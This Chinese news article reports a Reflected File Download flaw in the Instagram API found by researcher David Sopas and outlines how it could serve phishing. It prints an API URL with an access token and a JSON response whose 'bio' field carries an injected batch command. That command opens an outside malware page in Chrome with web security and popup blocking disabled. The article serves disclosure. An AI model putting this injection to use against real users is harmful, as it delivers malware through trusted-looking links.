以假乱真:利用Instagram API制造恶意分享链接

安全 应用安全
安全研究人员最近发现了一种利用Instagram API形成的恶意分享链接,由于这个链接指向Instagram域名,所以很容易被用户相信并下载。如果在钓鱼攻击中利用该漏洞,可以极大地提高攻击效率。

安全研究人员最近发现了一种利用Instagram API形成的恶意分享链接,由于这个链接指向Instagram域名,所以很容易被用户相信并下载。如果在钓鱼攻击中利用该漏洞,可以极大地提高攻击效率。

[[130590]]

漏洞详情

这个RFD(反射型文件名下载)漏洞存在于Instagram API中。通过篡改任何用户账号的访问令牌并使用一些技巧,攻击者可以创建一个恶意文件下载链接。同时由于这个链接指向Instagram域名上的合法资源,所以很难被用户觉察。

 “我在Instagram API上发现了一个RFD(反射型文件名下载),不需要向URL上添加任何指令,因为我们可以使用一个持久型反射域来实现它,例如用户账号上的“Bio”域。

那么,我们需要什么呢?仅仅需要一个令牌。不过不用担心,我们只需注册一个新的账号就能得到一个令牌。下一步,插入我们想在用户账号的“Bio”域(或其他域)中使用的批处理指令。接着,我将尝试用Chrome浏览器打开一个包含恶意代码的新页面,该恶意页面可以禁用该浏览器中的大多数保护机制。”

为了构建“反射型部分”,Sopas在用户账号的“Bio”域中插入了一个批处理指令,并解释说插入到其他域也可以实现同样的功能。然后,他用Chrome浏览器打开一个包含恶意代码的新页面,该恶意页面可以禁用浏览器中的大多数保护机制。

通过分析了用户的Instagram JSON文件,然后通过修改JSON文件来实现“文件名部分”:

https://api.instagram.com/v1/users/1750545056?access_token=339779002.4538cdb.fad79bd258364f4992156372fd01069a

{“meta”:{“code”:200},”data”:{“username”:”davidsopas”,”bio”:”\”||start chrome websegura.net\/malware.htm –disable-web-security –disable-popup-blocking||”,”website”:”http:\/\/websegura.net”,”profile_picture”:”https:\/\/igcdn-photos-f-a.akamaihd.net\/hphotos-ak-xaf1\/t51.2885-19\/11055505_1374264689564237_952365304_a.jpg”,”full_name”:”David Sopas”,”counts”:{“media”:0,”followed_by”:11,”follows”:3},”id”:”1750545056″}}

由于“文件名部分”的限制,这种附加方法只能在特定的浏览器中正常工作,这些浏览器包括Chrome、Opera、Chrome安卓版、安卓stock浏览器和火狐浏览器。

攻击演示视频

在他的攻击中,Sopas使用了一个特定的文件名,他创建的完整链接可以被发送到受害者的Instagram消息中。

下面的视频演示了该攻击的PoC:

Sopas假设了以下可能的攻击场景:

1、恶意用户向他所有的Instagram好友发送一条消息,其中包含一个指向恶意页面的链接。

2、受害者点击链接,检查并发现该文件存储在Instagram服务器,下载并运行它。

3、受害者感染恶意软件。

责任编辑:蓝雨泪 来源: FreeBuf
相关推荐

2012-04-21 19:02:25

黑客Instagram

2020-12-28 12:39:53

面部识别人工

2022-02-20 23:57:29

人工智能语音合成技术

2015-06-12 10:27:46

2021-06-08 10:23:12

人工智能人脸识别Deepfake

2023-11-10 00:09:25

人工智能虚假图片

2023-03-29 10:04:18

图像AI

2019-02-15 14:33:56

AI模型翻译语言

2019-02-18 11:26:49

AI 数据人工智能

2021-06-15 10:07:13

AI 数据人工智能

2020-11-13 07:08:35

AI人工智能

2017-06-08 11:11:32

互联网

2012-04-16 15:34:18

Instagram

2012-02-10 09:26:47

Instagram

2024-05-16 13:51:00

AI

2023-04-25 13:54:07

游戏AI

2018-07-20 09:12:00

人工智能机器学习虚假视频

2021-11-03 12:49:25

验证码网络钓鱼恶意软件

2022-05-05 09:04:33

恶意软件黑客

2019-07-20 11:00:00

神经网络数据图形
点赞
收藏

51CTO技术栈公众号